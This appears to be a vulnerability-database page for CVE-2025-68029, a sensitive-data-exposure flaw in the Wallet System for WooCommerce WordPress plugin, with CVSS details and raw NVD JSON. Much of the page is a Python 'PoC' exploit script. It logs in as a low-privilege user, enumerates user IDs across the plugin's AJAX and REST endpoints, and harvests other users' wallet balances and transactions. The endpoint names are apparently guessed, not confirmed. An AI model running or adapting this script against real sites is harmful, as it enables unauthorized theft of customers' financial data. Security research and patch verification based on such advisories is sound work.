Security Vulnerability Report
中文
CVE-2025-68029 CVSS 6.3 MEDIUM

CVE-2025-68029

Published: 2026-01-05 11:17:42
Last Modified: 2026-04-29 10:16:53

Description

Insertion of Sensitive Information Into Sent Data vulnerability in WP Swings Wallet System for WooCommerce wallet-system-for-woocommerce allows Retrieve Embedded Sensitive Data.This issue affects Wallet System for WooCommerce: from n/a through <= 2.7.3.

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Wallet System for WooCommerce <= 2.7.3 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-68029 PoC - Wallet System for WooCommerce Sensitive Data Exposure # Target: WordPress site with vulnerable Wallet System for WooCommerce plugin def exploit_cve_2025_68029(target_url, username, password): """ Exploit for CVE-2025-68029 Sensitive Information Disclosure in Wallet System for WooCommerce """ session = requests.Session() # Step 1: Login to WordPress with low-privilege account login_url = f"{target_url}/wp-login.php" login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': target_url } print(f"[*] Logging in as {username}...") response = session.post(login_url, data=login_data, allow_redirects=False) if 'wordpress_logged_in' not in session.cookies: print("[-] Login failed!") return None print("[+] Login successful!") # Step 2: Enumerate users and extract wallet information # Common AJAX endpoints for wallet plugin wallet_endpoints = [ '/wp-admin/admin-ajax.php', '/wp-json/wsw/v1/wallet/balance', '/wp-json/wsw/v1/wallet/transactions' ] sensitive_data = [] for endpoint in wallet_endpoints: print(f"\n[*] Checking endpoint: {endpoint}") # Try to retrieve wallet data for different user IDs for user_id in range(1, 100): params = { 'action': 'wsw_get_wallet_info', # Common action name 'user_id': user_id } try: response = session.get( f"{target_url}{endpoint}", params=params, timeout=10 ) if response.status_code == 200 and len(response.text) > 50: # Check if response contains sensitive information if any(keyword in response.text.lower() for keyword in ['balance', 'wallet', 'transaction', 'amount', 'credit']): print(f"[+] Found sensitive data for user_id={user_id}") sensitive_data.append({ 'user_id': user_id, 'endpoint': endpoint, 'data': response.text }) except requests.RequestException as e: continue return sensitive_data if __name__ == '__main__': if len(sys.argv) < 4: print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>") print(f"Example: python {sys.argv[0]} http://example.com testuser testpass") sys.exit(1) target = sys.argv[1] user = sys.argv[2] passwd = sys.argv[3] results = exploit_cve_2025_68029(target, user, passwd) if results: print(f"\n[!] Successfully extracted {len(results)} sensitive data entries") for i, data in enumerate(results): print(f"\n--- Entry {i+1} ---") print(f"User ID: {data['user_id']}") print(f"Data: {data['data'][:500]}") else: print("[-] No sensitive data found or exploit failed")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68029", "sourceIdentifier": "[email protected]", "published": "2026-01-05T11:17:41.537", "lastModified": "2026-04-29T10:16:52.790", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insertion of Sensitive Information Into Sent Data vulnerability in WP Swings Wallet System for WooCommerce wallet-system-for-woocommerce allows Retrieve Embedded Sensitive Data.This issue affects Wallet System for WooCommerce: from n/a through <= 2.7.3."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-201"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wallet-system-for-woocommerce/vulnerability/wordpress-wallet-system-for-woocommerce-plugin-2-7-1-sensitive-data-exposure-vulnerability?_s_id=cve", "source": "[email protected]"}]}}